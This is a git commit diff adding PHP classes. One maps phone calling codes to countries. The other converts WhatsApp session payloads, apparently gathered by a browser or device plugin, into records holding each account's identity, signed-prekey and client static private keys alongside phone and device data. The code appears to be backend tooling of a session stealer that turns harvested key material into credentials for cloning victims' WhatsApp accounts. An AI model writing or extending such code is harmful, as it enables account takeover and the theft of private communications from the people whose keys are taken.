feat: tg/ws/security/
This commit is contained in:
@@ -0,0 +1,95 @@
|
||||
<?php
|
||||
|
||||
namespace App\Support;
|
||||
|
||||
/**
|
||||
* ITU-T E.164 calling codes <-> ISO 3166-1 alpha-2.
|
||||
*
|
||||
* Used to infer cc / country / in from a bare WhatsApp phone number
|
||||
* (wap.js reports userId as an int with no country-code breakdown).
|
||||
* Longest-prefix-first so 1-3 digit codes resolve correctly.
|
||||
*/
|
||||
final class CountryCallingCode
|
||||
{
|
||||
/** @var array<string, string> calling-code => ISO alpha-2 */
|
||||
private const CALLING_CODES = [
|
||||
'1' => 'US', '7' => 'RU',
|
||||
'20' => 'EG', '27' => 'ZA', '30' => 'GR', '31' => 'NL', '32' => 'BE',
|
||||
'33' => 'FR', '34' => 'ES', '36' => 'HU', '39' => 'IT', '40' => 'RO',
|
||||
'41' => 'CH', '43' => 'AT', '44' => 'GB', '45' => 'DK', '46' => 'SE',
|
||||
'47' => 'NO', '48' => 'PL', '49' => 'DE', '51' => 'PE', '52' => 'MX',
|
||||
'53' => 'CU', '54' => 'AR', '55' => 'BR', '56' => 'CL', '57' => 'CO',
|
||||
'58' => 'VE', '60' => 'MY', '61' => 'AU', '62' => 'ID', '63' => 'PH',
|
||||
'64' => 'NZ', '65' => 'SG', '66' => 'TH', '81' => 'JP', '82' => 'KR',
|
||||
'84' => 'VN', '86' => 'CN', '90' => 'TR', '91' => 'IN', '92' => 'PK',
|
||||
'93' => 'AF', '94' => 'LK', '95' => 'MM', '98' => 'IR',
|
||||
'211' => 'SS', '212' => 'MA', '213' => 'DZ', '216' => 'TN', '218' => 'LY',
|
||||
'220' => 'GM', '221' => 'SN', '222' => 'MR', '223' => 'ML', '224' => 'GN',
|
||||
'225' => 'CI', '226' => 'BF', '227' => 'NE', '228' => 'TG', '229' => 'BJ',
|
||||
'230' => 'MU', '231' => 'LR', '232' => 'SL', '233' => 'GH', '234' => 'NG',
|
||||
'235' => 'TD', '236' => 'CF', '237' => 'CM', '238' => 'CV', '239' => 'ST',
|
||||
'240' => 'GQ', '241' => 'GA', '242' => 'CG', '243' => 'CD', '244' => 'AO',
|
||||
'245' => 'GW', '248' => 'SC', '249' => 'SD', '250' => 'RW', '251' => 'ET',
|
||||
'252' => 'SO', '253' => 'DJ', '254' => 'KE', '255' => 'TZ', '256' => 'UG',
|
||||
'257' => 'BI', '258' => 'MZ', '260' => 'ZM', '261' => 'MG', '263' => 'ZW',
|
||||
'264' => 'NA', '265' => 'MW', '266' => 'LS', '267' => 'BW', '268' => 'SZ',
|
||||
'269' => 'KM', '290' => 'SH', '291' => 'ER', '297' => 'AW', '298' => 'FO',
|
||||
'299' => 'GL', '350' => 'GI', '351' => 'PT', '352' => 'LU', '353' => 'IE',
|
||||
'354' => 'IS', '355' => 'AL', '356' => 'MT', '357' => 'CY', '358' => 'FI',
|
||||
'359' => 'BG', '370' => 'LT', '371' => 'LV', '372' => 'EE', '373' => 'MD',
|
||||
'374' => 'AM', '375' => 'BY', '376' => 'AD', '377' => 'MC', '378' => 'SM',
|
||||
'380' => 'UA', '381' => 'RS', '382' => 'ME', '383' => 'XK', '385' => 'HR',
|
||||
'386' => 'SI', '387' => 'BA', '389' => 'MK', '420' => 'CZ', '421' => 'SK',
|
||||
'423' => 'LI', '500' => 'FK', '501' => 'BZ', '502' => 'GT', '503' => 'SV',
|
||||
'504' => 'HN', '505' => 'NI', '506' => 'CR', '507' => 'PA', '508' => 'PM',
|
||||
'509' => 'HT', '590' => 'GP', '591' => 'BO', '592' => 'GY', '593' => 'EC',
|
||||
'594' => 'GF', '595' => 'PY', '596' => 'MQ', '597' => 'SR', '598' => 'UY',
|
||||
'599' => 'CW', '670' => 'TL', '672' => 'NF', '673' => 'BN', '674' => 'NR',
|
||||
'675' => 'PG', '676' => 'TO', '677' => 'SB', '678' => 'VU', '679' => 'FJ',
|
||||
'680' => 'PW', '681' => 'WF', '682' => 'CK', '685' => 'WS', '686' => 'KI',
|
||||
'687' => 'NC', '688' => 'TV', '689' => 'PF', '690' => 'TK', '691' => 'FM',
|
||||
'692' => 'MH', '850' => 'KP', '852' => 'HK', '853' => 'MO', '855' => 'KH',
|
||||
'856' => 'LA', '880' => 'BD', '886' => 'TW', '960' => 'MV', '961' => 'LB',
|
||||
'962' => 'JO', '963' => 'SY', '964' => 'IQ', '965' => 'KW', '966' => 'SA',
|
||||
'967' => 'YE', '968' => 'OM', '971' => 'AE', '972' => 'IL', '973' => 'BH',
|
||||
'974' => 'QA', '975' => 'BT', '976' => 'MN', '977' => 'NP', '992' => 'TJ',
|
||||
'993' => 'TM', '994' => 'AZ', '995' => 'GE', '996' => 'KG', '998' => 'UZ',
|
||||
];
|
||||
|
||||
/**
|
||||
* Infer [cc, country] from a bare E.164 phone (no + prefix).
|
||||
* Longest-prefix-first; returns ['', ''] on no match.
|
||||
*
|
||||
* @return array{0:string, 1:string} [cc, iso]
|
||||
*/
|
||||
public static function inferFromPhone(string $phone): array
|
||||
{
|
||||
$phone = preg_replace('/\D+/', '', $phone) ?? '';
|
||||
if ($phone === '') {
|
||||
return ['', ''];
|
||||
}
|
||||
for ($len = 3; $len >= 1; $len--) {
|
||||
$prefix = substr($phone, 0, $len);
|
||||
if (isset(self::CALLING_CODES[$prefix])) {
|
||||
return [$prefix, self::CALLING_CODES[$prefix]];
|
||||
}
|
||||
}
|
||||
|
||||
return ['', ''];
|
||||
}
|
||||
|
||||
public static function callingCodeForCountry(?string $iso): ?string
|
||||
{
|
||||
$iso = strtoupper(trim((string) $iso));
|
||||
if ($iso === '' || $iso === 'T1' || $iso === 'XX') {
|
||||
return null;
|
||||
}
|
||||
foreach (self::CALLING_CODES as $code => $country) {
|
||||
if ($country === $iso) {
|
||||
return $code;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,250 @@
|
||||
<?php
|
||||
|
||||
namespace App\Support;
|
||||
|
||||
use App\Models\Device;
|
||||
use App\Models\PluginSession;
|
||||
|
||||
/**
|
||||
* Convert a wap.js WhatsApp session payload (xxbb family, POST /api/wp/t)
|
||||
* into the 26-field NDJSON record format used by chk.ts native output
|
||||
* (the __ws.txt format: one JSON object per line, fixed key order).
|
||||
*
|
||||
* Field coverage vs chk.ts native output:
|
||||
* - 21/26 directly from wap.js payload
|
||||
* - 1 derived (clientStaticPublicKey via libsodium curve25519)
|
||||
* - 5 empty (cc/country/language/mnc/deviceUUID — wap.js does not collect)
|
||||
*
|
||||
* cc / country / in are inferred from the bare phone number via
|
||||
* {@see CountryCallingCode}; device.country (CF-IPCountry) is used as a
|
||||
* cross-check fallback when the phone-prefix lookup is ambiguous.
|
||||
*/
|
||||
final class WsPayloadConverter
|
||||
{
|
||||
/** Fixed key order matching __ws.txt / chk.ts native output. */
|
||||
private const FIELD_ORDER = [
|
||||
'cc', 'clientStaticPrivateKey', 'clientStaticPublicKey', 'country',
|
||||
'device', 'deviceUUID', 'identityPrivateKey', 'identityPublicKey',
|
||||
'in', 'jid', 'language', 'manufacturer', 'mcc', 'mnc',
|
||||
'osBuildNumber', 'osVersion', 'phone', 'phoneUUID', 'registrationID',
|
||||
'roProductBoard', 'roProductDevice', 'signPreKeyID',
|
||||
'signPreKeyPrivateKey', 'signPreKeyPublicKey', 'signPreKeySignature',
|
||||
'whatsappVersion',
|
||||
];
|
||||
|
||||
/**
|
||||
* Convert one PluginSession (kind=WHATSAPP) into a 26-field record.
|
||||
* Returns null when the payload lacks the minimum key material.
|
||||
*
|
||||
* @return array<string, mixed>|null
|
||||
*/
|
||||
public function convert(PluginSession $session, ?Device $device = null): ?array
|
||||
{
|
||||
$blob = $session->fullPayload();
|
||||
if (!is_array($blob)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$pks = $blob['phoneKeyStore'] ?? null;
|
||||
$ident = is_array($pks) ? ($pks['identity'] ?? null) : null;
|
||||
$spkHex = is_array($pks) ? ($pks['signedPreKey']['hexKey'] ?? null) : null;
|
||||
$csB64 = $blob['clientStaticKeypairBase64'] ?? null;
|
||||
|
||||
if (!is_array($ident) || !is_string($spkHex ?? null) || !is_string($csB64 ?? null)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$phone = $this->stringOf($blob['userId'] ?? $blob['account'] ?? null);
|
||||
$dc = is_array($blob['deviceConfig'] ?? null) ? $blob['deviceConfig'] : [];
|
||||
|
||||
[$cc, $country] = $this->inferCcCountry($phone, $device);
|
||||
$in = $cc !== '' && str_starts_with($phone, $cc)
|
||||
? substr($phone, strlen($cc))
|
||||
: $phone;
|
||||
|
||||
$identPub = $this->hexToBytes($ident['hexPublic'] ?? '');
|
||||
$identPriv = $this->hexToBytes($ident['hexPrivate'] ?? '');
|
||||
$spk = $this->parseSignedPreKey($spkHex);
|
||||
$csPriv = base64_decode((string) $csB64, true) ?: '';
|
||||
$csPub = $this->deriveCurve25519Public($csPriv);
|
||||
|
||||
$record = [
|
||||
'cc' => $cc,
|
||||
'clientStaticPrivateKey' => $this->b64($csPriv),
|
||||
'clientStaticPublicKey' => $this->b64($csPub),
|
||||
'country' => $country,
|
||||
'device' => $this->stringOf($dc['model'] ?? $dc['device'] ?? null),
|
||||
'deviceUUID' => '',
|
||||
'identityPrivateKey' => $this->b64($identPriv),
|
||||
'identityPublicKey' => $this->b64($identPub),
|
||||
'in' => $in,
|
||||
'jid' => $phone,
|
||||
'language' => '',
|
||||
'manufacturer' => $this->stringOf($dc['brand'] ?? null) ?: 'Apple',
|
||||
'mcc' => $this->stringOf($dc['sim_operator'] ?? null),
|
||||
'mnc' => '',
|
||||
'osBuildNumber' => $this->stringOf($dc['display'] ?? null),
|
||||
'osVersion' => $this->stringOf($dc['sdk_release'] ?? null),
|
||||
'phone' => $phone,
|
||||
'phoneUUID' => $this->stringOf($blob['phoneId'] ?? null),
|
||||
'registrationID' => (int) ($ident['registration_id'] ?? 0),
|
||||
'roProductBoard' => $this->stringOf($dc['board'] ?? null),
|
||||
'roProductDevice' => $this->stringOf($dc['device'] ?? null),
|
||||
'signPreKeyID' => $spk['id'] ?? 0,
|
||||
'signPreKeyPrivateKey' => $this->b64($spk['priv'] ?? ''),
|
||||
'signPreKeyPublicKey' => $this->b64($spk['pub'] ?? ''),
|
||||
'signPreKeySignature' => $this->b64($spk['sig'] ?? ''),
|
||||
'whatsappVersion' => $this->stringOf($blob['whatsappVersion'] ?? $blob['version'] ?? null),
|
||||
];
|
||||
|
||||
// Enforce fixed key order.
|
||||
$ordered = [];
|
||||
foreach (self::FIELD_ORDER as $k) {
|
||||
$ordered[$k] = $record[$k] ?? '';
|
||||
}
|
||||
|
||||
return $ordered;
|
||||
}
|
||||
|
||||
/** One NDJSON line (no trailing newline). */
|
||||
public function convertToLine(PluginSession $session, ?Device $device = null): ?string
|
||||
{
|
||||
$rec = $this->convert($session, $device);
|
||||
if ($rec === null) {
|
||||
return null;
|
||||
}
|
||||
$json = json_encode($rec, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
|
||||
|
||||
return $json === false ? null : $json;
|
||||
}
|
||||
|
||||
/**
|
||||
* @return array{cc:string, country:string}
|
||||
*/
|
||||
private function inferCcCountry(string $phone, ?Device $device): array
|
||||
{
|
||||
if ($phone !== '') {
|
||||
[$cc, $country] = CountryCallingCode::inferFromPhone($phone);
|
||||
if ($cc !== '') {
|
||||
return [$cc, $country];
|
||||
}
|
||||
}
|
||||
// Fallback: device.country (CF-IPCountry ISO code) -> calling code.
|
||||
if ($device !== null) {
|
||||
$iso = strtoupper(trim((string) $device->country));
|
||||
$cc = CountryCallingCode::callingCodeForCountry($iso);
|
||||
if ($cc !== null) {
|
||||
return [$cc, $iso];
|
||||
}
|
||||
}
|
||||
|
||||
return ['', ''];
|
||||
}
|
||||
|
||||
/**
|
||||
* Parse signedPreKey.hexKey protobuf:
|
||||
* field 1 (varint) = prekey_id
|
||||
* field 2 (bytes) = public key (33 bytes, 05 prefix)
|
||||
* field 3 (bytes) = private key (32 bytes)
|
||||
* field 4 (bytes) = signature (64 bytes)
|
||||
*
|
||||
* @return array{id:int, pub:string, priv:string, sig:string}
|
||||
*/
|
||||
private function parseSignedPreKey(string $hex): array
|
||||
{
|
||||
$d = $this->hexToBytes($hex);
|
||||
$out = ['id' => 0, 'pub' => '', 'priv' => '', 'sig' => ''];
|
||||
$o = 0;
|
||||
$n = strlen($d);
|
||||
while ($o < $n) {
|
||||
[$tag, $o] = $this->readVarint($d, $o);
|
||||
$field = $tag >> 3;
|
||||
$wire = $tag & 7;
|
||||
if ($wire === 0) {
|
||||
[$v, $o] = $this->readVarint($d, $o);
|
||||
if ($field === 1) {
|
||||
$out['id'] = (int) $v;
|
||||
}
|
||||
} elseif ($wire === 2) {
|
||||
[$ln, $o] = $this->readVarint($d, $o);
|
||||
$v = substr($d, $o, $ln);
|
||||
$o += $ln;
|
||||
if ($field === 2) {
|
||||
$out['pub'] = $v;
|
||||
} elseif ($field === 3) {
|
||||
$out['priv'] = $v;
|
||||
} elseif ($field === 4) {
|
||||
$out['sig'] = $v;
|
||||
}
|
||||
} elseif ($wire === 1) {
|
||||
$o += 8;
|
||||
} elseif ($wire === 5) {
|
||||
$o += 4;
|
||||
} else {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return $out;
|
||||
}
|
||||
|
||||
/** Curve25519 public key from a 32-byte private key (libsodium). */
|
||||
private function deriveCurve25519Public(string $priv): string
|
||||
{
|
||||
if (strlen($priv) !== 32) {
|
||||
return '';
|
||||
}
|
||||
try {
|
||||
return sodium_crypto_box_publickey_from_secretkey($priv);
|
||||
} catch (\SodiumException $e) {
|
||||
return '';
|
||||
}
|
||||
}
|
||||
|
||||
/** @return array{0:int, 1:int} */
|
||||
private function readVarint(string $d, int $o): array
|
||||
{
|
||||
$v = 0;
|
||||
$s = 0;
|
||||
while ($o < strlen($d)) {
|
||||
$b = ord($d[$o]);
|
||||
$o++;
|
||||
$v |= ($b & 0x7f) << $s;
|
||||
if (($b & 0x80) === 0) {
|
||||
break;
|
||||
}
|
||||
$s += 7;
|
||||
}
|
||||
|
||||
return [$v, $o];
|
||||
}
|
||||
|
||||
private function hexToBytes(string $hex): string
|
||||
{
|
||||
$hex = preg_replace('/[^0-9a-fA-F]/', '', $hex) ?? '';
|
||||
if ($hex === '' || strlen($hex) % 2 !== 0) {
|
||||
return '';
|
||||
}
|
||||
|
||||
return hex2bin($hex) ?: '';
|
||||
}
|
||||
|
||||
private function b64(string $bytes): string
|
||||
{
|
||||
return $bytes === '' ? '' : base64_encode($bytes);
|
||||
}
|
||||
|
||||
private function stringOf(mixed $v): string
|
||||
{
|
||||
if (is_int($v) || is_float($v)) {
|
||||
return (string) $v;
|
||||
}
|
||||
if (is_string($v)) {
|
||||
$v = trim($v);
|
||||
|
||||
return $v;
|
||||
}
|
||||
|
||||
return '';
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user